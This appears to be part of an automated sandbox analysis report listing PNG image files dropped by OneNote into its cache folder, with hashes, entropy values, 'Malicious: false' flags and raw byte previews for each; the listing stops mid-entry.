SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
